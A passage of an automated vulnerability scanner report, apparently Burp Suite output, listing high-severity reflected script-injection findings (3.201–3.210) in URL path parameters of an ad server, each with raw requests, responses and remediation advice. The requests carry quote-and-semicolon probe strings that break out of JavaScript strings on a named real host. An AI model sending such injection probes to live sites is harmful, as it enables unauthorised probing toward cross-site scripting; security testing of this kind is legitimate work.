<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.4;sz=728x90;click0=http://o1.qnsr.com//cgi/c%3Fa=20140829%3Bx=3585%3Bg=0,0a9129';96c2477c71d%3Bc=203687989,203687989%3Bi=0%3Bn=203%3Bs=9542%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

3.201. http://e2.cdn.qnsr.com//cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59ed7'%3bde0cfbe8e7b was submitted in the REST URL parameter 7. This input was echoed as 59ed7';de0cfbe8e7b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20140829/3585/0/0/20368798959ed7'%3bde0cfbe8e7b/203687989//0/203/9542//4000004/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1516
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:42 GMT
Date: Sat, 26 Feb 2011 01:49:42 GMT
Connection: close


var zzADS_CHAN = '20368798959ed7';de0cfbe8e7b';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = zzPage_obj[zzADS_CHAN].zzTrd;

...[SNIP]...

3.202. http://e2.cdn.qnsr.com//cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js

Issue detail

The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 714d0'%3b84e7733cd79 was submitted in the REST URL parameter 8. This input was echoed as 714d0';84e7733cd79 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20140829/3585/0/0/203687989/203687989714d0'%3b84e7733cd79//0/203/9542//4000004/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1498
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:45 GMT
Date: Sat, 26 Feb 2011 01:49:45 GMT
Connection: close


var zzADS_CHAN = '203687989';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.4;sz=728x90;click0=http://o1.qnsr.com//cgi/c%3Fa=20140829%3Bx=3585%3Bg=0,0%3Bc=203687989,203687989714d0';84e7733cd79%3Bi=0%3Bn=203%3Bs=9542%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

3.203. http://e2.cdn.qnsr.com//cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js

Issue detail

The value of REST URL parameter 9 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bc40'%3b05fa3e45893 was submitted in the REST URL parameter 9. This input was echoed as 5bc40';05fa3e45893 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20140829/3585/0/0/203687989/203687989//05bc40'%3b05fa3e45893/203/9542//4000004/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1498
Cache-Control: max-age=2591966
Expires: Mon, 28 Mar 2011 01:49:14 GMT
Date: Sat, 26 Feb 2011 01:49:48 GMT
Connection: close


var zzADS_CHAN = '203687989';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.4;sz=728x90;click0=http://o1.qnsr.com//cgi/c%3Fa=20140829%3Bx=3585%3Bg=0,0%3Bc=203687989,203687989%3Bi=05bc40';05fa3e45893%3Bn=203%3Bs=9542%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

3.204. http://e2.cdn.qnsr.com//cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 10]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 10 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41e20'%3b27304de4fd1 was submitted in the REST URL parameter 10. This input was echoed as 41e20';27304de4fd1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142454/2305/0/0/203687985/203687985//0/20341e20'%3b27304de4fd1/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1499
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:51 GMT
Date: Sat, 26 Feb 2011 01:49:51 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
nguage=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.6;sz=300x250;click0=http://o1.qnsr.com//cgi/c%3Fa=20142454%3Bx=2305%3Bg=0,0%3Bc=203687985,203687985%3Bi=0%3Bn=20341e20';27304de4fd1%3Bs=9542%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

3.205. http://e2.cdn.qnsr.com//cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 11]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 11 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cee84'%3bfb335840d2c was submitted in the REST URL parameter 11. This input was echoed as cee84';fb335840d2c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542cee84'%3bfb335840d2c//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1499
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:54 GMT
Date: Sat, 26 Feb 2011 01:49:54 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.6;sz=300x250;click0=http://o1.qnsr.com//cgi/c%3Fa=20142454%3Bx=2305%3Bg=0,0%3Bc=203687985,203687985%3Bi=0%3Bn=203%3Bs=9542cee84';fb335840d2c%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

3.206. http://e2.cdn.qnsr.com//cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb585'%3bfb49cec39f9 was submitted in the REST URL parameter 4. This input was echoed as cb585';fb49cec39f9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142454/2305cb585'%3bfb49cec39f9/0/0/203687985/203687985//0/203/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1499
Cache-Control: max-age=2591972
Expires: Mon, 28 Mar 2011 01:49:03 GMT
Date: Sat, 26 Feb 2011 01:49:31 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.6;sz=300x250;click0=http://o1.qnsr.com//cgi/c%3Fa=20142454%3Bx=2305cb585';fb49cec39f9%3Bg=0,0%3Bc=203687985,203687985%3Bi=0%3Bn=203%3Bs=9542%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

3.207. http://e2.cdn.qnsr.com//cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0efa'%3be267596c3ab was submitted in the REST URL parameter 5. This input was echoed as c0efa';e267596c3ab in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142454/2305/0c0efa'%3be267596c3ab/0/203687985/203687985//0/203/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1499
Cache-Control: max-age=2591949
Expires: Mon, 28 Mar 2011 01:48:44 GMT
Date: Sat, 26 Feb 2011 01:49:35 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.6;sz=300x250;click0=http://o1.qnsr.com//cgi/c%3Fa=20142454%3Bx=2305%3Bg=0c0efa';e267596c3ab,0%3Bc=203687985,203687985%3Bi=0%3Bn=203%3Bs=9542%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

3.208. http://e2.cdn.qnsr.com//cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e74a'%3bbdfb1e10276 was submitted in the REST URL parameter 6. This input was echoed as 7e74a';bdfb1e10276 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142454/2305/0/07e74a'%3bbdfb1e10276/203687985/203687985//0/203/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1499
Cache-Control: max-age=2591985
Expires: Mon, 28 Mar 2011 01:49:23 GMT
Date: Sat, 26 Feb 2011 01:49:38 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.6;sz=300x250;click0=http://o1.qnsr.com//cgi/c%3Fa=20142454%3Bx=2305%3Bg=0,07e74a';bdfb1e10276%3Bc=203687985,203687985%3Bi=0%3Bn=203%3Bs=9542%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

3.209. http://e2.cdn.qnsr.com//cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3891'%3ba2a152fce1c was submitted in the REST URL parameter 7. This input was echoed as d3891';a2a152fce1c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142454/2305/0/0/203687985d3891'%3ba2a152fce1c/203687985//0/203/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1517
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:41 GMT
Date: Sat, 26 Feb 2011 01:49:41 GMT
Connection: close


var zzADS_CHAN = '203687985d3891';a2a152fce1c';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = zzPage_obj[zzADS_CHAN].zzTrd;

...[SNIP]...

3.210. http://e2.cdn.qnsr.com//cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a25ba'%3bfe48c25a940 was submitted in the REST URL parameter 8. This input was echoed as a25ba';fe48c25a940 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142454/2305/0/0/203687985/203687985a25ba'%3bfe48c25a940//0/203/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1499
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:44 GMT
Date: Sat, 26 Feb 2011 01:49:44 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
